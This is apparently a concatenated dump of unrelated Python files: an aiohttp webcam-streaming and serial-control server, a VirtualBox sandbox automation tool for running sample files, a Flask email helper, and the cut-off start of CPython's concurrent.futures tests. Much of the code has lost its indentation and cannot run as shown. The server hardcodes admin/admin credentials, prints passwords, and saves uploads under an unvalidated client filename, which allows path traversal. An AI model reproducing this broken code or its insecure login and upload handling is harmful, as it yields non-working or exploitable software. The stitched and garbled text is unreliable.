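#     t = poll_sensor(0.5)   # returns the started Thread; t.join() to wait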
def get_args():
parser = argparse.ArgumentParser( description="Aiohttp based streaming service", )
parser.add_argument( "-s", "--storage", help="Path to photo storage root directory", required=False, type=str, default=os.getenv("STORAGE" , DEFAULT_STORAGE),)
parser.add_argument( "-d", "--delay" , help="Interval between sending the chunks in seconds", required=False, type=float, default=os.getenv("DELAY" , DEFAULT_DELAY), )
parser.add_argument( "-l", "--log" , help="Loging level", required=False, type=str, choices=ALLOWED_LOG_LEVELS, default=os.getenv("LOG_LEVEL", DEFAULT_LOG_LEVEL), )
args = parser.parse_args()
return args
class VideoCaptureThreading:
def __init__(self, src=0, width=640, height=480):
self.src = src
self.cap = cv2.VideoCapture(self.src)
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
self.grabbed, self.frame = self.cap.read()
self.started = False
self.read_lock = threading.Lock()
def set(self, var1, var2):
self.cap.set(var1, var2)
def start(self):
if self.started:
print('[!] Threaded video capturing has already been started.')
return None
self.started = True
self.thread = threading.Thread(target=self.update, args=())
self.thread.start()
return self
def update(self):
while self.started:
grabbed, frame = self.cap.read()
with self.read_lock:
self.grabbed = grabbed
self.frame = frame
def read(self):
with self.read_lock:
frame = self.frame.copy()
grabbed = self.grabbed
return grabbed, frame
def stop(self):
self.started = False
self.thread.join()
    def __enter__(self):
        return self.start()
    def __exit__(self, exec_type, exc_value, traceback):
        self.cap.release()
class VideoCamera(object):
def __init__(self):
self.logger = logging.getLogger(__name__)
""""""; logging.basicConfig(level=logging.INFO,format='[%(levelname)s] (%(threadName)-10s) %(message)s',)
self._raw_channel = Queue()
self.video = cv2.VideoCapture(0);logging.debug("start camera");print("start camera")
self.encode_param = (int(cv2.IMWRITE_JPEG_QUALITY), 90)
def __del__(self):
self.video.release();print("video.release")
def delete(self):
self.video.release();print("video.release")
def get_frame(self):
success, image = self.video.read()
# We are using Motion JPEG, but OpenCV defaults to capture raw images,
# so we must encode it into JPEG in order to correctly display the
        # video stream (see the framing sketch after this class).
try:
ret, jpeg = cv2.imencode('.jpg', image)
except Exception as e:
logging.debug('Exception encoding image ' + str(e))
return None
#self._raw_channel.put(jpeg)
return jpeg.tobytes()
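# Hedged sketch (not wired into this app; _mjpeg_frame_iter and the "frame"
# boundary are illustrative): how the JPEG bytes from get_frame() are typically
# framed into a multipart/x-mixed-replace ("Motion JPEG") body. mjpeg_handler
# below does the equivalent with aiohttp's MultipartWriter.
def _mjpeg_frame_iter(camera, boundary=b"frame"):
    while True:
        jpeg = camera.get_frame()
        if jpeg is None:
            break
        yield (b"--" + boundary + b"\r\n"
               b"Content-Type: image/jpeg\r\n"
               b"Content-Length: " + str(len(jpeg)).encode() + b"\r\n\r\n" +
               jpeg + b"\r\n")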
@middleware
async def authorize(request, handler):
print("Do Auchetication=");
logging.debug("Do Auchetication=",request.path.startswith('/login')) #False
session = await aiohttp_session.get_session(request)
logging.debug("Dsession uid=",session.get('uid'))
if (not session.get('uid')) and (not request.path.startswith('/login')):
url = request.app.router['login'].url_for()
        logging.debug('redirecting to {}'.format(str(url)))
raise web.HTTPFound(url)
response = await handler(request)
return response
def redirect(request, router_name):
print("redirect");
url = request.app.router[router_name].url_for()
logging.debug("redirect url =",url) #False
log.debug('redirecting to {}'.format(url))
raise web.HTTPFound(url)
'''middleware redirects to Login in case there is no 'uid' found in the request's session'''
class Login(web.View):
async def get(self):
        session = await aiohttp_session.get_session(self.request)
uid = 'user{0}'.format(random.randint(1, 1001))
uids = self.request.app['uids']
while uid in uids:
uid = 'user{0}'.format(random.randint(1, 1001))
uids.append(uid)
self.request.app['uids'] = uids
session['uid'] = uid
        logging.debug(uid)
redirect(self.request, '/')
class WSClient(object):
def __init__(self, ws):
global WSID
self.id = WSID
self.ws = ws
WSID+=1
async def send(self,msg):
await self.ws.send_str(msg)
class WSHandler:
def __init__(self):
self.ws_list = set()
async def ws_handler(self, request):
ws = web.WebSocketResponse()
await ws.prepare(request)
client = WSClient(ws)
self.ws_list.add(client)
print('Websocket connection ready')
print('Total clients: ' , self.ws_list, str(len(self.ws_list)))
#Total clients:{<__main__.WSClient object at 0xF28>, <__main__.WSClient object at 0x630>, <__main__.WSClient object at 0xD58F6D8>} 3
for c in self.ws_list:
print( c.ws,c.id )
#<WebSocketResponse Switching Protocols GET /ws > 1
#<WebSocketResponse Switching Protocols GET /ws > 0
#<WebSocketResponse Switching Protocols GET /ws > 2
await self._send_user_list()
#loop---------
async for msg in ws:
if msg.type == aiohttp.WSMsgType.TEXT:
Income=msg.data;
parsing(Income) #message = msg.json()
await ws.send_str("got your message website")
#---------loop
self.ws_list.remove(client)
print("Removing... " + str(len(self.ws_list)))
return ws
async def _send_user_list(self):
token = [c.id for c in self.ws_list if c.id]
for c in self.ws_list:
await c.ws.send_str('LIST*{}'.format(token));print('we send LIST*{}'.format(token) )#LIST*[4, 2, 3, 1]
return
async def uploadFile(request):
print("uploadFile");
reader = await request.multipart()
# /!\ Don't forget to validate your inputs /!\
# reader.next() will `yield` the fields of your form
field = await reader.next()
assert field.name == 'name'
name = await field.read(decode=True)
field = await reader.next()
assert field.name == 'mp3'
filename = field.filename
# You cannot rely on Content-Length if transfer is chunked.
size = 0
with open(os.path.join('/spool/yarrr-media/mp3/', filename), 'wb') as f:
while True:
chunk = await field.read_chunk() # 8192 bytes by default.
if not chunk:
break
size += len(chunk)
f.write(chunk)
    return web.Response(text='{} sized of {} successfully stored'.format(filename, size))
async def mjpeg_handler(request):
print("mjpeg_handler=",request.url);
#browse(locals(), 'locals()')
#param1=request.get('client');
com = request.rel_url.query['com']; print("com=",com)
if com=='start':
# param2 = request.rel_url.query['age']
# result = "name: {}, age: {}".format(param1, param2)
boundary = "boundarydonotcross";
responseImage = web.StreamResponse(status=200, reason='OK', headers={'Content-Type': 'multipart/x-mixed-replace; ''boundary=--%s' % boundary,})
#responseImage.content_type = 'multipart/x-mixed-replace;boundary=ffserver'
await responseImage.prepare(request) #Send HTTP header. You should not change any header data after calling this method.
VC = cv2.VideoCapture(0);
request.app["camera"]=VC
encode_param = (int(cv2.IMWRITE_JPEG_QUALITY), 90)
request.app["streaming"].add(responseImage)
while True:
try:
_, frame = VC.read(); #await
if frame is None:
break
with MultipartWriter('image/jpeg', boundary=boundary) as mpwriter:
result, encimg = cv2.imencode('.jpg', frame, encode_param)
                    data = encimg.tobytes()
mpwriter.append(data, {'Content-Type': 'image/jpeg'})
await mpwriter.write(responseImage, close_boundary=False);print("next frame");
await asyncio.sleep(0.010)#await responseImage.drain()
except asyncio.CancelledError as e:
request.app["streaming"].remove(responseImage);request.app["camera"].remove(VC)
print("Exit camera mjpeg_handler");
VC.shutdown();
return responseImage
else :
print("streaming_clear",request.app["camera"]);
if request.app["camera"] is not None:
request.app["camera"].release();
return web.Response();#return HTTPNotFound(text='No file found')
#await shut_down(request)
# async def startcamera(request):
# scheduler = await aiojobs.create_scheduler()
# await scheduler.spawn(mjpeg_handler(request))
async def stopcamera(request):
    print("stopcamera")
    camera = request.app.get('camera')
    if camera is not None:
        camera.release()
        request.app['camera'] = None
    return web.Response(text='camera stopped')
def parsing(data):
print("parsing websocket data=",data);#data= <WebSocketResponse Switching Protocols GET /ws >
#await GlobalWS.send_str("AKA")
async def websocket_handler(request):
#logging.debug("this is another one= ",request.app["GlobalWS"])
if request.app["GlobalWS"] != None:
print(" return, this is more than one client:{} ".format(request.app["GlobalWS"]))
return
print('--------------------Websocket connection starting>>>>>>>>>>>>>>>>>>>')
ws = web.WebSocketResponse()
await ws.prepare(request)
request.app["GlobalWS"]=1000
logging.debug('------- -----Websocket connection ready------- -----')
request.app["websockets"].add(ws)
async for msg in ws:
        # this loop remains live for the lifetime of the connection
        if msg.type == aiohttp.WSMsgType.TEXT:
            Income = msg.data
            if _writer:
                _writer.write(Income.encode())  # the serial writer expects bytes
print(Income)
#check serial
request.app["GlobalWS"]=None;#.remove(ws)
request.app['websockets'].discard(ws)
return ws
async def websockets_clear(app):
print("websockets_clear");
for ws in app['websockets']:
await ws.close()
app['websockets'].clear()
    app['streaming'].clear()
    if app.get('camera') is not None: app['camera'].release(); app['camera'] = None
    print("streaming_clear done")
async def index(request):
logging.debug("index simple handler")
return web.Response(text='<div><img src="/imageH" /></div><p> video </p><div><img src="/imageV" /></div>', content_type='text/html')
async def handle_index_page(request):
global IsAucheticated
print(">>>>>>....IsAucheticated = ?",IsAucheticated)
if not IsAucheticated:
return await handle_login_page(request)
print("handle_index_page");
request.app["GlobalWS"] = None
if VERBOSE_DEBUG:
str="index_page method={},host={},path={},headers={},transport={},cookies={}".format(request.method,request.host,request.path,request.headers,request.transport,request.cookies,)
logging.debug(str);print(str)#clientIP = request.headers['X-Forwarded-For'] #password = None " url=",request.app.router['login'].url_for());# logging.debug(request.headers)
async with aiofiles.open(INDEX_File, mode='r') as index_file:
index_contents = await index_file.read()
return web.Response(text=index_contents, content_type='text/html')
async def handle_login_page(request):
#print("handle_login_page=",request.url_for());
if VERBOSE_DEBUG:
str="login_page method={},host={},path={},headers={},transport={},cookies={}".format(request.method,request.host,request.path,request.headers,request.transport,request.cookies,)
logging.debug(str);print(str)
async with aiofiles.open(LOGIN_File, mode='r') as index_file:
index_contents = await index_file.read()
return web.Response(text=index_contents, content_type='text/html')
async def handle_authenticate(request):
print("handle_authenticate");
global IsAucheticated
if VERBOSE_DEBUG:
str="authenticate method={},host={},path={},headers={},transport={},cookies={}".format(request.method,request.host,request.path,request.headers,request.transport,request.cookies,)
logging.debug(str);print(str)
data=await request.post() #<MultiDictProxy('uname': 'xxx', 'psw': 'c', 'remember': 'on')>
#user=data.get('uname');password=data.get('psw')
user = data['uname']; password = data['psw']
print("username =",user," password =",password )
if user=="admin" and password=="admin":
IsAucheticated = True
logging.debug("login successful");print("login successful")
return await handle_index_page(request)
else :
logging.debug("login failed");print("login failed")
return await handle_login_page(request)
# for key,val in data.items():
# logging.debug(key, "=>", val)
#browse(locals(), 'locals()')
async def serialWriteLoop(f):
global _writer
print("send serialRead")
message =b'>*>p0x0800'
while True:
print(b'>*>p0x0800')
if(_writer):
for b in message:
_writer.write(bytes([b]))
await asyncio.sleep(1/f);
# message = b'foo\nbar\nbaz\nqux\n'
# for b in message:
# self.transport.serial.write(bytes([b]))
# print(f'Writer sent: {bytes([b])}')
async def SerialReader(loop):
global _reader,_writer
    _reader, _writer = await serial_asyncio.open_serial_connection(url=PORT, baudrate=BAUDRATE, loop=loop)
print("_reader",_reader);print("_writer",_writer);print(b'>*>p0x0800')
_writer.write(b'>*>p0x0800')
while True:
line = await _reader.readline();print( len(line))
#line = line.decode("utf-8").strip()
#print(bytes(line, 'utf-8'))
for x in GlobalAPP['websockets']:
            await x.send_str(line.decode("utf-8", errors="replace"))  # send_str expects text, readline returns bytes
def SerialReceiveThread():
print (comPort.is_open)
if comPort.is_open:
while True:
size = comPort.inWaiting()
if size:
data = comPort.read(size)
print (data)
else:
pass#print ('no data')
else:
print ('comPort not open')
def PeriodicWriteSerialThread(f=1):
while comPort:
print(b'>*>p0x0800')#pitch=0,roll=0,yaw=0,thrust=0
comPort.write(b'>*>p0x0800')#CTRL_INPUT(thrust=F_Tmap(Thrust)))
time.sleep(1/f)
async def setup_server(loop, address, port):
global GlobalAPP
GlobalAPP=app = web.Application(loop=loop)
app.router.add_route('GET', "/login", handle_login_page) #login?uname=asd&psw=asd&remember=on
app.router.add_route('POST', "/", handle_authenticate)
app.router.add_route('GET', "/", handle_index_page)
app.router.add_static('/static/', path=STATIC_DIR, name='static')
app.router.add_route('GET', "/image", mjpeg_handler)
app.router.add_route('GET', "/stopcamera", stopcamera)
#wshandler = WSHandler()
#app.router.add_get('/ws', wshandler.ws_handler)
app.router.add_route('GET', '/ws', websocket_handler)
app["GlobalWS"] = None
    app['websockets'] = set()
    app['streaming'] = set()   # active MJPEG StreamResponse objects
    app['camera'] = None       # cv2.VideoCapture in use (if any)
    app['psw'] = 'admin';app['uname'] = 'admin'
app.on_shutdown.append(websockets_clear)
app["threads"] = threading.Event()
app["arg"] = get_args()
# app.middlewares.append(authorize)
#logging.debug(app.router['login'].url_for())
#aiohttp_jinja2.setup(app, loader=jinja2.FileSystemLoader(STATIC_DIR))
# for name, resource in app.router.named_resources().items():
# logging.debug("Name of resource:",name,"R=", resource)
return await loop.create_server(app.make_handler(), address, port)
def server_begin():
ip='0.0.0.0';port=8080
loop = asyncio.new_event_loop();
print("[server_begin]",loop) #get_event_loop get_running_loop
asyncio.set_event_loop(loop)
asyncio.run_coroutine_threadsafe(setup_server(loop, ip,port ), loop)
#asyncio.run_coroutine_threadsafe(SerialReader(loop) , loop)
print("Server ready!",ip,port)
logging.debug("Server ready!");print("Server ready!",ip,port)
try:
loop.run_forever()
except KeyboardInterrupt:
logging.debug("Shutting Down!");print("Shutting Down!")
loop.close()
def setup_serial():
loop = asyncio.new_event_loop();
asyncio.set_event_loop(loop)
loop.run_until_complete(asyncio.gather(SerialReader(loop),serialWriteLoop(1)))
#loop.run_until_complete(SerialReader(loop))
loop.run_forever()
def mainApp():
global comPort
try:
comPort = serial.Serial(port=PORT,baudrate=BAUDRATE,parity=serial.PARITY_NONE,stopbits=serial.STOPBITS_ONE,bytesize=serial.EIGHTBITS)
comPort.timeout =.1
print(sys.getsizeof(comPort))
    except serial.SerialException as e:
        print("unable to open serial port:", e)
threading.Thread(target=SerialReceiveThread).start()
threading.Thread(target=PeriodicWriteSerialThread,args=(20,)).start()
#threading.Thread(target=readInputThread).start()
threading.Thread(target = server_begin ).start()
#threading.Thread(target = setup_serial ).start()
#serial_threads.join()
#main_threads.join() ;
if __name__ == '__main__':
try:
mainApp()
except KeyboardInterrupt:
print('Interrupted')
# try:
# sys.exit(0)
# except SystemExit:
# os._exit(0)
"""
Calling a coroutine function returns a coroutine object.
To execute a coroutine object, use await in front of it, or await coroObj await asyncio.sleep(10)
schedule it with ensure_future() or asyncio.ensure_future(coroObj),asyncio.ensure_future(coro_function("example.com"))
create_task() asyncio.get_event_loop().create_task(coro_function("example.com"))
future is callable coroObj future = loop.create_future(), future.add_done_callback(fn)
future = loop.create_task(coroutine)
future = asyncio.ensure_future(coroutine[, loop=loop])
use an event loop in the main thread loop = asyncio.get_event_loop()
run an event loop in another thread loop = asyncio.new_event_loop() asyncio.set_event_loop(loop)
loop.run_until_complete(<future or coroutine>).
loop.run_until_complete(asyncio.wait([ ]))
loop.run_until_complete(asyncio.gather( ))
loop.run_until_complete(asyncio.gather(helloworld(), asyncio.sleep(2))) run a co-routine repeatedly for 2 seconds
to add a function to an already running event loop asyncio.ensure_future(my_coro())
async def corotinglist():
await asyncio.gather( coro2(), coro2() )
loop = asyncio.get_event_loop()
loop.run_until_complete(corotinglist())
"""
|
demo_cli.py
|
import argparse
import logging
import os
import threading
import time
import http.client
script_version = '0.11'
try:
import support_functions
import vm_functions
except ModuleNotFoundError:
print('Unable to import support_functions and/or vm_functions. Exiting.')
exit(1)
# Parse command line arguments
parser = argparse.ArgumentParser(prog='vm-automation', description=f'''VirtualBox VM automation {script_version};
https://github.com/Pernat1y/vm-automation''')
required_options = parser.add_argument_group('Required options')
required_options.add_argument('file', type=str, nargs='+', help='Path to file')
required_options.add_argument('--vms', '-v', type=str, nargs='*', required=True,
help='Space-separated list of VMs to use')
required_options.add_argument('--snapshots', '-s', type=str, nargs='*', required=True,
help='Space-separated list of snapshots to use')
main_options = parser.add_argument_group('Main options')
main_options.add_argument('--vboxmanage', default='vboxmanage', type=str, nargs='?',
help='Path to vboxmanage binary (default: %(default)s)')
main_options.add_argument('--check_version', action='store_true',
help='Check for latest VirtualBox version online (default: %(default)s)')
main_options.add_argument('--timeout', default=60, type=int, nargs='?',
help='Timeout in seconds for both commands and VM (default: %(default)s)')
main_options.add_argument('--delay', default=7, type=int, nargs='?',
help='Delay in seconds before/after starting VMs (default: %(default)s)')
main_options.add_argument('--threads', default=2, choices=range(9), type=int, nargs='?',
help='Number of concurrent threads to run (0=number of VMs, default: %(default)s)')
main_options.add_argument('--verbosity', default='info', choices=['debug', 'info', 'error', 'off'], type=str, nargs='?',
help='Log verbosity level (default: %(default)s)')
main_options.add_argument('--debug', action='store_true',
help='Print all messages. Alias for "--verbosity debug" (default: %(default)s)')
main_options.add_argument('--log', default=None, type=str, nargs='?',
                          help='Path to log file, "console", or "off" (default: %(default)s, i.e. console)')
main_options.add_argument('--report', action='store_true',
help='Generate html report (default: %(default)s)')
main_options.add_argument('--record', action='store_true',
                          help='Record video of guest\'s screen (default: %(default)s)')
main_options.add_argument('--pcap', action='store_true',
help='Enable recording of VM\'s traffic (default: %(default)s)')
main_options.add_argument('--memdump', action='store_true', help='Dump VM memory (default: %(default)s)')
main_options.add_argument('--no_time_sync', action='store_true',
help='Disable host-guest time sync for VM (default: %(default)s)')
guests_options = parser.add_argument_group('VM options')
guests_options.add_argument('--ui', default='gui', choices=['1', '0', 'gui', 'headless'], nargs='?',
help='Start VMs in GUI or headless mode (default: %(default)s)')
guests_options.add_argument('--login', '--user', default='user', type=str, nargs='?',
help='Login for guest OS (default: %(default)s)')
guests_options.add_argument('--password', default='12345678', type=str, nargs='?',
help='Password for guest OS (default: %(default)s)')
guests_options.add_argument('--remote_folder', default='desktop', choices=['desktop', 'downloads', 'documents', 'temp'],
type=str, nargs='?',
help='Destination folder in guest OS to place file. (default: %(default)s)')
guests_options.add_argument('--open_with', default='%windir%\\explorer.exe', type=str,
nargs='?', help='Absolute path to app, which will open main file (default: %(default)s)')
guests_options.add_argument('--file_args', default=None, type=str, nargs='?',
help='Argument to pass to the main file/executable (default: %(default)s)')
guests_options.add_argument('--network', default=None, choices=['on', 'off'], nargs='?',
help='State of network adapter of guest OS (default: %(default)s)')
guests_options.add_argument('--resolution', default=None, type=str, nargs='?',
help='Screen resolution for guest OS. Can be set to "random" (default: %(default)s)')
guests_options.add_argument('--mac', default=None, type=str, nargs='?',
help='Set MAC address for guest OS. Can be set to "random" (default: %(default)s)')
guests_options.add_argument('--get_file', default=None, type=str, nargs='?',
help='Get specific file from guest OS before stopping VM (default: %(default)s)')
guests_options.add_argument('--pre', default=None, type=str, nargs='?',
help='Script to run before main file (default: %(default)s)')
guests_options.add_argument('--post', default=None, type=str, nargs='?',
help='Script to run after main file (default: %(default)s)')
args = parser.parse_args()
# Main options
filename = args.file[0]
vms_list = args.vms
snapshots_list = args.snapshots
threads = args.threads
timeout = args.timeout
delay = args.delay
verbosity = args.verbosity
debug = args.debug
log = args.log
report = args.report
record = args.record
pcap = args.pcap
memdump = args.memdump
no_time_sync = args.no_time_sync
# vm_functions options
vm_functions.vboxmanage_path = args.vboxmanage
check_version = args.check_version
ui = args.ui
vm_functions.timeout = timeout
# VM options
vm_pre_exec = args.pre
vm_post_exec = args.post
vm_login = args.login
vm_password = args.password
remote_folder = args.remote_folder
open_with = args.open_with
file_args = args.file_args
vm_network_state = args.network
vm_resolution = args.resolution
vm_mac = args.mac
vm_get_file = args.get_file
# Some VirtualBox commands require full path to file
cwd = os.getcwd()
# Logging options
if debug:
verbosity = 'debug'
if log == 'off':
logging.disable()
elif verbosity in ['error', 'info', 'debug']:
log_levels = {'error': logging.ERROR,
'info': logging.INFO,
'debug': logging.DEBUG}
if log == 'console':
vm_functions.logging.basicConfig(format='%(asctime)s [%(levelname)s] %(message)s', level=log_levels[verbosity])
else:
vm_functions.logging.basicConfig(format='%(asctime)s [%(levelname)s] %(message)s', level=log_levels[verbosity],
filename=log, filemode='a')
vm_functions.logger = logging.getLogger('vm-automation')
# Show general info
def show_info():
logging.info(f'Script version: {script_version}')
vbox_version = vm_functions.virtualbox_version(strip_newline=1, strip_build=1)[1]
logging.info(f'VirtualBox version: {vbox_version}\n')
# Check for VirtualBox version
if check_version:
print(f'Script version: {script_version}')
conn = http.client.HTTPSConnection("download.virtualbox.org")
conn.request("GET", "/virtualbox/LATEST-STABLE.TXT")
r1 = conn.getresponse()
if r1.status == 200:
latest_version = r1.read().rstrip().decode("utf-8")
if latest_version == vbox_version:
logging.debug('Using latest VirtualBox version.')
else:
logging.info(f'New version of VirtualBox available: {latest_version}.')
else:
logging.warning('Unable to check for VirtualBox version.')
logging.info(f'VMs: {vms_list}')
logging.info(f'Snapshots: {snapshots_list}\n')
result = support_functions.file_info(filename)
if result[0] != 0:
logging.error('Error while processing file. Exiting.')
exit(1)
return result[1], result[2], result[3]
# Function to take screenshot on guest OS
def take_screenshot(vm, task_name):
screenshot_index = 1
while screenshot_index < 10000:
screenshot_index_zeros = str(screenshot_index).zfill(4)
if report:
screenshot_name_num = f'reports/{sha256}/{task_name}_{screenshot_index_zeros}.png'
else:
screenshot_name_num = f'{task_name}_{screenshot_index_zeros}.png'
if os.path.isfile(screenshot_name_num):
screenshot_index += 1
else:
vm_functions.vm_screenshot(vm, screenshot_name_num)
break
# Main routines
def main_routine(vm, snapshots_list):
for snapshot in snapshots_list:
task_name = f'{vm}_{snapshot}'
logging.info(f'{task_name}: Task started')
# Create directory for report
if report:
            os.makedirs(f'reports/{sha256}', mode=0o755, exist_ok=True)  # directory must be writable for report files
# Stop VM, restore snapshot
vm_functions.vm_stop(vm, ignore_status_error=1)
time.sleep(delay / 2)
result = vm_functions.vm_snapshot_restore(vm, snapshot, ignore_status_error=1)
if result[0] != 0:
# If we were unable to restore snapshot - continue to the next snapshot/VM
logging.error(f'Unable to restore VM "{vm}" to snapshot "{snapshot}". Skipping.')
vm_functions.vm_stop(vm, ignore_status_error=1)
continue
# Change MAC address
if vm_mac:
vm_functions.vm_set_mac(vm, vm_mac)
# Disable time sync
if no_time_sync:
vm_functions.vm_disable_time_sync(vm)
# Dump traffic
if pcap:
if vm_network_state == 'off':
logging.warning('Traffic dump enabled, but network state is set to \'off\'.')
if report:
pcap_file = f'{cwd}/reports/{sha256}/{vm}_{snapshot}.pcap'
else:
pcap_file = f'{cwd}/{vm}_{snapshot}.pcap'
vm_functions.vm_pcap(vm, pcap_file)
# Start VM
time.sleep(delay / 2)
result = vm_functions.vm_start(vm, ui)
if result[0] != 0:
# If we were unable to start VM - continue to the next one
logging.error(f'Unable to start VM "{vm}". Skipping.')
vm_functions.vm_stop(vm, ignore_status_error=1)
continue
# Wait for VM
time.sleep(delay)
# Set guest network state
result = vm_functions.vm_network(vm, vm_network_state)
if result[0] != 0:
vm_functions.vm_stop(vm)
continue
# Set guest resolution
vm_functions.vm_set_resolution(vm, vm_resolution)
# Start screen recording
if record:
if report:
recording_name = f'{cwd}/reports/{sha256}/{vm}_{snapshot}.webm'
else:
recording_name = f'{cwd}/{vm}_{snapshot}.webm'
recording_name = support_functions.normalize_path(recording_name)
vm_functions.vm_record(vm, recording_name)
# Run pre exec script
if vm_pre_exec:
vm_functions.vm_exec(vm, vm_login, vm_password, vm_pre_exec, open_with=open_with, file_args=file_args)
take_screenshot(vm, task_name)
else:
logging.debug('Pre exec is not set.')
# Set path to file on guest OS
remote_file_path = support_functions.randomize_filename(vm_login, filename, remote_folder)
# Upload file to VM, check if file exist and execute
result = vm_functions.vm_upload(vm, vm_login, vm_password, filename, remote_file_path)
if result[0] != 0:
take_screenshot(vm, task_name)
vm_functions.vm_stop(vm)
continue
# Check if file exist on VM
result = vm_functions.vm_file_stat(vm, vm_login, vm_password, remote_file_path)
if result[0] != 0:
take_screenshot(vm, task_name)
vm_functions.vm_stop(vm)
continue
take_screenshot(vm, task_name)
# Run file
result = vm_functions.vm_exec(vm, vm_login, vm_password, remote_file_path, open_with=open_with,
file_args=file_args)
if result[0] != 0:
take_screenshot(vm, task_name)
vm_functions.vm_stop(vm)
continue
take_screenshot(vm, task_name)
for _ in range(2):
logging.debug(f'Waiting for {timeout / 2} seconds...')
time.sleep(timeout / 2)
take_screenshot(vm, task_name)
# Check for file at the end of task
result = vm_functions.vm_file_stat(vm, vm_login, vm_password, remote_file_path)
if result[0] != 0:
            logging.info('Original file does not exist anymore (melted or removed by AV).')
# Run post exec script
if vm_post_exec:
vm_functions.vm_exec(vm, vm_login, vm_password, vm_post_exec, open_with=open_with)
take_screenshot(vm, task_name)
else:
logging.debug('Post exec is not set.')
# Get file from guest
if vm_get_file:
# Normalize path and extract file name
src_path = support_functions.normalize_path(vm_get_file)
src_filename = os.path.basename(src_path)
if report:
# Place in reports directory
dst_file = f'{cwd}/reports/{sha256}/{src_filename}'
else:
# Place in current dir
dst_file = f'{cwd}/{src_filename}'
# Download file
vm_functions.vm_copyfrom(vm, vm_login, vm_password, src_path, dst_file)
# Stop recording
if record:
vm_functions.vm_record_stop(vm)
# Dump VM memory
if memdump:
if report:
memdump_file = f'{cwd}/reports/{sha256}/{vm}_{snapshot}.dmp'
else:
memdump_file = f'{cwd}/{vm}_{snapshot}.dmp'
vm_functions.vm_memdump(vm, memdump_file)
# Stop VM
vm_functions.vm_stop(vm)
# Save html report as ./reports/<file_hash>/index.html
if report:
support_functions.html_report(vm, snapshot, filename, file_args, file_size, sha256, md5, timeout,
vm_network_state)
logging.info(f'{task_name}: Task finished')
if 'all' in vms_list:
# If vms_list is set to 'all', obtain list of all available VMs and use them
vms_list = vm_functions.list_vms()
# Autodetect snapshots
if 'all' in snapshots_list:
snapshots_autodetect = True
else:
snapshots_autodetect = False
# Number of concurrent threads
if threads == 0:
threads = len(vms_list)
logging.debug(f'Threads count is set to number of VMs: {threads}')
else:
if threads > len(vms_list):
        logging.warning(f'Number of concurrent threads is larger than the number of available VMs ({len(vms_list)}).')
threads = len(vms_list)
logging.debug(f'Threads count is set to {threads}')
# Show file information
sha256, md5, file_size = show_info()
# Start threads
for vm in vms_list:
# Limit number of concurrent threads
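    # (threading.active_count() includes the main thread, hence the "- 1".)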
while threading.active_count() - 1 >= threads:
time.sleep(delay / 2)
if snapshots_autodetect:
logging.debug('Snapshots list will be obtained from VM information.')
snapshots_list = vm_functions.list_snapshots(vm)
if snapshots_list[0] == 0:
snapshots_list = snapshots_list[1]
else:
logging.error(f'Unable to get list of snapshots for VM "{vm}". Skipping.')
continue
try:
t = threading.Thread(target=main_routine, args=(vm, snapshots_list))
t.name = f'{vm}_{snapshots_list}'
t.start()
time.sleep(delay) # Delay before starting next VM
except (KeyboardInterrupt, SystemExit):
raise
|
email.py
|
from app import mail
from flask import current_app
from flask_mail import Message
from threading import Thread
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(current_app._get_current_object(), msg)).start()
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
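# Hedged usage sketch (not part of the original module): send_email() is meant to be
# called from inside a Flask request or application context, e.g. in a view function:
#
#   send_email('[MyApp] Password reset',
#              sender='noreply@example.com',
#              recipients=[user.email],
#              text_body=render_template('email/reset.txt', user=user),
#              html_body=render_template('email/reset.html', user=user))
#
# 'user' and the template names are illustrative assumptions only.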
|
test_concurrent_futures.py
|
from test import support
# Skip tests if _multiprocessing wasn't built.
support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
support.import_module('multiprocessing.synchronize')
from test.support.script_helper import assert_python_ok
import contextlib
import itertools
import logging
from logging.handlers import QueueHandler
import os
import queue
import sys
import threading
import time
import unittest
import weakref
from pickle import PicklingError
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future,
BrokenExecutor)
from concurrent.futures.process import BrokenProcessPool
from multiprocessing import get_context
import multiprocessing.process
import multiprocessing.util
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
INITIALIZER_STATUS = 'uninitialized'
def mul(x, y):
return x * y
def capture(*args, **kwargs):
return args, kwargs
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
def init(x):
global INITIALIZER_STATUS
INITIALIZER_STATUS = x
def get_init_status():
return INITIALIZER_STATUS
def init_fail(log_queue=None):
if log_queue is not None:
logger = logging.getLogger('concurrent.futures')
logger.addHandler(QueueHandler(log_queue))
logger.setLevel('CRITICAL')
logger.propagate = False
time.sleep(0.1) # let some futures be scheduled
raise ValueError('error in initializer')
class MyObject(object):
def my_method(self):
pass
class EventfulGCObj():
def __init__(self, mgr):
self.event = mgr.Event()
def __del__(self):
self.event.set()
def make_dummy_object(_):
return MyObject()
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._thread_key = support.threading_setup()
def tearDown(self):
support.reap_children()
support.threading_cleanup(*self._thread_key)
class ExecutorMixin:
worker_count = 5
executor_kwargs = {}
def setUp(self):
super().setUp()
self.t1 = time.monotonic()
if hasattr(self, "ctx"):
self.executor = self.executor_type(
max_workers=self.worker_count,
mp_context=self.get_context(),
**self.executor_kwargs)
else:
self.executor = self.executor_type(
max_workers=self.worker_count,
**self.executor_kwargs)
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
self.executor = None
dt = time.monotonic() - self.t1
if support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 300, "synchronization issue: test lasted too long")
super().tearDown()
def get_context(self):
return get_context(self.ctx)
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
